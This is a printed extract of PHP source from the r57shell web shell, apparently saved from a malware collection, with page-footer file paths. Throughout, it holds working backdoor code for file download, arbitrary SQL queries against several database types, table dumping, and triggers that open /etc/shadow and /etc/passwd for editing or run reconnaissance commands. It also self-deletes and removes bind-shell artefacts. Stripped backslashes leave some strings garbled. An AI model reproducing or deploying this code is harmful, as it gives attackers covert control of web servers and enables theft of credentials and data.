  • 9. { document.getElementById(id).style.display = 'none'; document.cookie=id+'=0;'; } function show_div(id) { document.getElementById(id).style.display = 'block'; document.cookie=id+'=1;'; } function change_divst(id) { if (document.getElementById(id).style.display == 'none') show_div(id); else hide_div(id); } </script>'; class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "x50x4bx05x06x00x00x00x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 10. if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = 'x' . $dtime[6] . $dtime[7] . 'x' . $dtime[4] . $dtime[5] . 'x' . $dtime[2] . $dtime[3] . 'x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "x50x4bx03x04"; $fr .= "x14x00"; $fr .= "x00x00"; $fr .= "x08x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 11. $zdata = gzcompress($data); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $this -> datasec[] = $fr; $cdrec = "x50x4bx01x02"; $cdrec .= "x00x00"; $cdrec .= "x14x00"; $cdrec .= "x00x00"; $cdrec .= "x08x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 12. $this -> old_offset += strlen($fr); $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "x00x00"; } } function compress(&$filename,&$filedump,$compress) { global $content_encoding; global $mime_type; if ($compress == 'bzip' && @function_exists('bzcompress')) { $filename .= '.bz2'; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 13. $mime_type = 'application/x-bzip2'; $filedump = bzcompress($filedump); } else if ($compress == 'gzip' && @function_exists('gzencode')) { $filename .= '.gz'; $content_encoding = 'x-gzip'; $mime_type = 'application/x-gzip'; $filedump = gzencode($filedump); } else if ($compress == 'zip' && @function_exists('gzcompress')) { $filename .= '.zip'; $mime_type = 'application/zip'; $zipfile = new zipfile(); $zipfile -> addFile($filedump, substr($filename, 0, -4)); $filedump = $zipfile -> file(); } else { $mime_type = 'application/octet-stream'; } } function moreread($temp){ global $lang,$language; $str=''; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 14. if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('feof')&&@f unction_exists('fclose') && ($ffile = @fopen($temp, "r"))){ if($ffile){ while(!@feof($ffile)){$str .= @fgets($ffile);}; fclose($ffile); } }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesi ze')&&($ffile = @fopen($temp, "r"))){ if($ffile){ $str = @fread($ffile, @filesize($temp)); @fclose($ffile); } }elseif(@function_exists('file')&&($ffiles = @file($temp))){ foreach ($ffiles as $ffile) { $str .= $ffile; } }elseif(@function_exists('file_get_contents')){ $str = @file_get_contents($temp); }elseif(@function_exists('readfile')){ $str = @readfile($temp); }elseif(@function_exists('highlight_file')){ $str = @highlight_file($temp); }elseif(@function_exists('show_source')){ $str = @show_source($temp); }else{echo $lang[$language.'_text56'];} return $str; } function readzlib($filename,$temp=''){ file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 15. global $lang,$language; $str=''; if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");}; if(@copy("compress.zlib://".$filename, $temp)) { $str = moreread($temp); } else echo $lang[$language.'_text119']; @unlink($temp); return $str; } function morewrite($temp,$str='') { global $lang,$language; if(@function_exists('fopen') && @function_exists('fwrite') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){ if($ffile){ @fwrite($ffile,$str); @fclose($ffile); } }elseif(@function_exists('fopen') && @function_exists('fputs') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){ if($ffile){ @fputs($ffile,$str); @fclose($ffile); } }elseif(@function_exists('file_put_contents')){ @file_put_contents($temp,$str); }else return 0; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 16. return 1; } function mailattach($to,$from,$subj,$attach) { $headers = "From: $fromrn"; $headers .= "MIME-Version: 1.0rn"; $headers .= "Content-Type: ".$attach['type']; $headers .= "; name="".$attach['name'].""rn"; $headers .= "Content-Transfer-Encoding: base64rnrn"; $headers .= chunk_split(base64_encode($attach['content']))."rn"; if(mail($to,$subj,"",$headers)) { return 1; } return 0; } class my_sql { var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 17. var $num_rows; var $num_fields; var $dump; function connect() { switch($this->db) { case 'MySQL': if(empty($this->port)) { $this->port = '3306'; } if(!@function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; break; case 'MSSQL': if(empty($this->port)) { $this->port = '1433'; } if(!@function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection) return 1; break; case 'PostgreSQL': if(empty($this->port)) { $this->port = '5432'; } $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!@function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; break; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 18. case 'Oracle': if(!@function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; break; case 'MySQLi': if(empty($this->port)) { $this->port = '3306'; } if(!@function_exists('mysqli_connect')) return 0; $this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port); if(is_resource($this->connection)) return 1; break; case 'mSQL': if(!@function_exists('msql_connect')) return 0; $this->connection = @msql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; break; case 'SQLite': if(!@function_exists('sqlite_open')) return 0; $this->connection = @sqlite_open($this->base); if(is_resource($this->connection)) return 1; break; } return 0; } function select_db() { file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 19. switch($this->db) { case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; case 'MySQLi': return 1; break; case 'mSQL': if(@msql_select_db($this->base,$this->connection)) return 1; break; case 'SQLite': return 1; break; } return 0; } file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 20. function query($query) { $this->res=$this->error=''; switch($this->db) { case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) { $this->error = @mysql_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection))) { $this->error = 'Query error'; return 0; } else if(@mssql_num_rows($this->res) > 0) { return 1; } return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query))) { $this->error = @pg_last_error($this->connection); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 21. return 0; } else if(@pg_num_rows($this->res) > 0) { return 1; } return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query))) { $this->error = 'Query parse error'; } else { if(@ociexecute($this->res)) { if(@ocirowcount($this->res) != 0) return 2; return 1; } $error = @ocierror(); $this->error=$error['message']; } break; case 'MySQLi': if(false===($this->res=@mysqli_query($this->connection,$query))) { $this->error = @mysqli_error($this->connection); return 0; } file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 22. else if(is_resource($this->res)) { return 1; } return 2; break; case 'mSQL': if(false===($this->res=@msql_query($query,$this->connection))) { $this->error = @msql_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case 'SQLite': if(false===($this->res=@sqlite_query($this->connection,$query))) { $this->error = @sqlite_error_string($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; } return 0; } function get_result() { $this->rows=array(); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 23. $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db) { case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 24. while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'MySQLi': $this->num_rows=@mysqli_num_rows($this->res); $this->num_fields=@mysqli_num_fields($this->res); while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res))); @mysqli_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'mSQL': $this->num_rows=@msql_num_rows($this->res); $this->num_fields=@msql_num_fields($this->res); while(false !== ($this->rows[] = @msql_fetch_array($this->res))); @msql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'SQLite': $this->num_rows=@sqlite_num_rows($this->res); $this->num_fields=@sqlite_num_fields($this->res); while(false !== ($this->rows[] = @sqlite_fetch_array($this->res))); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; } return 0; } file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 25. function dump($table) { if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '## Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db) { case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table']; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (''.@implode("', '", $this->rows[$i]).'');'; } break; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 26. case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (''.@implode("', '", $this- >rows[$i]).'');'; } break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (''.@implode("', '", $this- >rows[$i]).'');'; } break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 27. foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (''.@implode("', '", $this- >rows[$i]).'');'; } break; case 'MySQLi': $this->dump[0] = '## MySQLi dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (''.@implode("', '", $this- >rows[$i]).'');'; } break; case 'mSQL': $this->dump[0] = '## mSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (''.@implode("', '", $this- >rows[$i]).'');'; } break; case 'SQLite': $this->dump[0] = '## SQLite dump'; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 28. if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (''.@implode("', '", $this- >rows[$i]).'');'; } break; default: return 0; break; } return 1; } function close() { switch($this->db) { case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 29. break; case 'Oracle': @oci_close($this->connection); break; case 'MySQLi': @mysqli_close($this->connection); break; case 'mSQL': @msql_close($this->connection); break; case 'SQLite': @sqlite_close($this->connection); break; } } function affected_rows() { switch($this->db) { case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 30. break; case 'Oracle': return @ocirowcount($this->res); break; case 'MySQLi': return @mysqli_affected_rows($this->res); break; case 'mSQL': return @msql_affected_rows($this->res); break; case 'SQLite': return @sqlite_changes($this->res); break; default: return 0; break; } } } if(isset($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) { if($file=moreread($_POST['d_name'])){ $filedump = $file; } else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; } if(!empty($_POST['cmd'])) { @ob_clean(); $filename = @basename($_POST['d_name']); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 31. $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename="".$filename."";"); echo $filedump; exit(); } } if(isset($_GET['1'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); } if (isset($_POST['cmd']) && $_POST['cmd']=="db_query") { echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo '<body bgcolor=#e4e0d8>'; if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>"; else { if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 32. color=red><b>Can't select database</b></font></div>"; else { foreach($querys as $num=>$query) { if(strlen($query)>5) { echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query)) { case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql- >error."</b></font></td></tr></table>"; break; case '1': if($sql->get_result()) { echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", $sql->columns); echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++) { foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; } file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 33. echo "</table>"; } break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; } } } } } echo "<br><form name=form method=POST>"; echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cmd',0,'db_query'); echo "<div align=center>"; echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value="".$sql- >base.""></font><br>"; echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=" Run SQL query "></div><br><br>"; echo "</form>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 34. ]</b></font></div>"; die(); } if(isset($_GET['12'])) { @unlink(__FILE__); } if(isset($_GET['11'])) { @unlink($tempdir.'bdpl'); @unlink($tempdir.'back'); @unlink($tempdir.'bd'); @unlink($tempdir.'bd.c'); @unlink($tempdir.'dp'); @unlink($tempdir.'dpc'); @unlink($tempdir.'dpc.c'); @unlink($tempdir.'prxpl'); @unlink($tempdir.'grep.txt'); } if(isset($_GET['2'])) { echo $head; function U_value($value) { if ($value == '') return '<i>no value</i>'; if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; if ($value === null) return 'NULL'; if (@is_object($value)) $value = (array) $value; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 35. if (@is_array($value)) { @ob_start(); print_r($value); $value = @ob_get_contents(); @ob_end_clean(); } return U_wordwrap((string) $value); } function U_wordwrap($str) { $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); } if (@function_exists('ini_get_all')) { $r = ''; echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; foreach (@ini_get_all() as $key=>$value) { $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=- 2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=- 2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; } echo $r; echo '</table>'; } file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 36. echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); } if(isset($_GET['3'])) { echo $head; echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; $cpuf = @file("cpuinfo"); if($cpuf) { $c = @sizeof($cpuf); for($i=0;$i<$c;$i++) { $info = @explode(":",$cpuf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; } echo $r; } else { echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; } echo '</table>'; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 37. die(); } if(isset($_GET['4'])) { echo $head; echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; $memf = @file("meminfo"); if($memf) { $c = sizeof($memf); for($i=0;$i<$c;$i++) { $info = explode(":",$memf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; } echo $r; } else { echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; } echo '</table>'; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 38. } if(isset($_GET['5'])) {$_POST['cmd'] = 'systeminfo';} if(isset($_GET['6'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';} if(isset($_GET['7'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';} if(isset($_GET['8'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';} if(isset($_GET['9'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';} if(isset($_GET['10'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';} if(isset($_GET['13'])) {$_POST['cmd']='cat /proc/cpuinfo';} if(isset($_GET['14'])) {$_POST['cmd']='cat /proc/version';} if(isset($_GET['15'])) {$_POST['cmd'] = 'free';} if(isset($_GET['16'])) {$_POST['cmd'] = 'dmesg(8)';} if(isset($_GET['17'])) {$_POST['cmd'] = 'vmstat';} if(isset($_GET['18'])) {$_POST['cmd'] = 'lspci';} if(isset($_GET['19'])) file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 39. {$_POST['cmd'] = 'lsdev';} if(isset($_GET['20'])) {$_POST['cmd']='cat /proc/interrupts';} if(isset($_GET['21'])) {$_POST['cmd'] = 'cat /etc/*realise';} if(isset($_GET['22'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';} if(isset($_GET['23'])) {$_POST['cmd'] = 'lsattr -va';} if(isset($_GET['24'])) {$_POST['cmd'] = 'w';} if(isset($_GET['25'])) {$_POST['cmd'] = 'who';} if(isset($_GET['26'])) {$_POST['cmd'] = 'uptime';} if(isset($_GET['27'])) {$_POST['cmd'] = 'last -n 10';} if(isset($_GET['28'])) {$_POST['cmd'] = 'ps -aux';} if(isset($_GET['29'])) {$_POST['cmd'] = 'service --status-all';} if(isset($_GET['30'])) {$_POST['cmd'] = 'ifconfig';} if(isset($_GET['31'])) {$_POST['cmd'] = 'netstat -a';} if(isset($_GET['32'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';} file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
